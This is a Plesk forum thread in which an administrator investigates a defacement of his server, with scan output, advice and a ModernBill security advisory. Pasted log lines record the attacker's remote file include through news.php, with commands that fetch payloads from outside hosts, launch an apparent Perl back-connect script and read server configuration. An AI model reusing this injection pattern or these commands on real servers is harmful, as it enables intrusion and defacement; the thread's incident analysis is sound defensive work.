• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

Hacked by Infection Group

R

ryanz

Basic Pleskian
Hacked by Infection Group (Check your Modernbill Version)

Hi,

One of our servers was hacked by "Infection Group" and all index files were replaced by modified index.html files.

So far I only found two executable files called l_all.exe and ram.exe in /tmp

Does anyone have experience with this or know how they did it and what to check for?

Any help would be appreciated.
 
Thanks pdreissen,

We have chkrootkit installed and it came up clean. I've now installed rkhunter and get the following warnings on a RH9 (Fully updated) Plesk 7.5.X:

Application advisories
* Application scan
Checking Apache2 modules ... [ Not found ]
Checking Apache configuration ... [ OK ]

* Application version scan
- GnuPG 1.2.1 [ Old or patched version ]
- Apache 2.0.40 [ Old or patched version ]
- Bind DNS [unknown] [ OK ]
- OpenSSL 0.9.7a [ Old or patched version ]
PHP Warning: Function registration failed - duplicate name - sg_load in Unknown on line 0
PHP Warning: SourceGuardian: Unable to register functions, unable to load in Unknown on line 0
- PHP 4.3.10 [ OK ]
- Procmail MTA 3.22 [ OK ]
- ProFTPd 1.2.10 [ OK ]
- OpenSSH 3.9.0p1 [ OK ]

---------------------------- Scan results ----------------------------

MD5
MD5 compared: 51
Incorrect MD5 checksums: 0

File scan
Scanned files: 342
Possible infected files: 0

Application scan
Vulnerable applications: 3

Scanning took 126 seconds

-----------------------------------------------------------------------

It seems all index.php, index.html, index.jsp, etc were replaced by an index file in /tmp

Still looking through the logs...
 
Seems that some of your apps or old and possible "unsafe" version.
Please get those updated.

Also check /var/spool/cron maybe there is an Apache cron entry...

Remove it if you don't need what's inside it.

Please read this thread for some good advice on howto secure your server:

http://forum.plesk.com/showthread.php?s=&threadid=19876
 
Look at these extracts from a domain logfile:

"GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://doptik.i8.com/Bd/bd_daemon.jpg HTTP/1.1" 200 2575 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20geocities.com/deiz0r/dc.pl HTTP/1.1" 200 2556 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;perl%20dc.pl%20201.0.218.111%2021 HTTP/1.1" 200 2287 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=locate%20httpd.conf HTTP/1.1" 200 2585 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.conf%20|%20grep%20ServerName HTTP/1.1" 200 2350 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/vhosts/;ls HTTP/1.1" 200 2247 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/vhosts/CVS;ls HTTP/1.1" 200 2247 "
T /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/;ls HTTP/1.1" 200 2247 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.include%20|%20grep%20ServerName HTTP/1.1" 200 3164 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.include%20|%20grep%20DocumentRoot HTTP/1.1" 200 3349 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/default;ls HTTP/1.1" 200 2205 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/;ls HTTP/1.1" 200 4350 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts;ls HTTP/1.1" 200 4350 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs;ls HTTP/1.1" 200 3502 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs;wget%20http://www.viavincitore.com.br/imagens/l_all.exe HTTP/1.1" 200 2556 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/l_all.exe HTTP/1.1" 200 3327 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/ram.exe HTTP/1.1" 200 3322 "
GET /ram.exe HTTP/1.1" 403 562 "
GET /l_all.exe HTTP/1.1" 200 497152 "
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "
GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs/modernbill/;cat%20ram.exe HTTP/1.1" 200 2212 "
GET /l_all.exe HTTP/1.1" 200 497152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0

Maybe this has some clues and can help some of the other users. The IP addresses were 200.232.233.235 and 201.0.218.111
 
Look at this

From Modernbill Support

Version 4.3.1 Release - Security Update

In keeping with our quarterly release policy, ModernGigabyte is proud to release our new version 4.3.1. Please note that this version release contains some important security upgrades. You will want to upgrade to this version as soon as practicable. Changes in PHP scripting methods make it necessary for us to make changes from time to time to reduce the possibility of cross-scripting and SQL injection attacks.

If you are unable to upgrade, please ensure you have removed the "samples" directory from your ModernBill installation. The "samples" files are not intented for live usage and should only be used as an example of how to integrate some aspects of ModernBill into your existing web site.

This will protect your ModernBill from the "Remote File Include Vulnerability" until you can upgrade to the latest release.
 
You must log in or register to reply here.

Similar threads

E
Issue Abnormal CPU usage and Apache crash
Replies
13
Views
921
MartinT
M
G
Issue Database Malware or False Positive?
Replies
2
Views
377
Gene Steinberg
G
K
Resolved Case sensitive index files
Replies
3
Views
264
kevinjansen
K
R
Resolved Index.php not loading
Replies
13
Views
2K
Maarten.
M
L
Question Fail2ban ignorecommand
Replies
5
Views
599
Peter Debik
P
Back
Top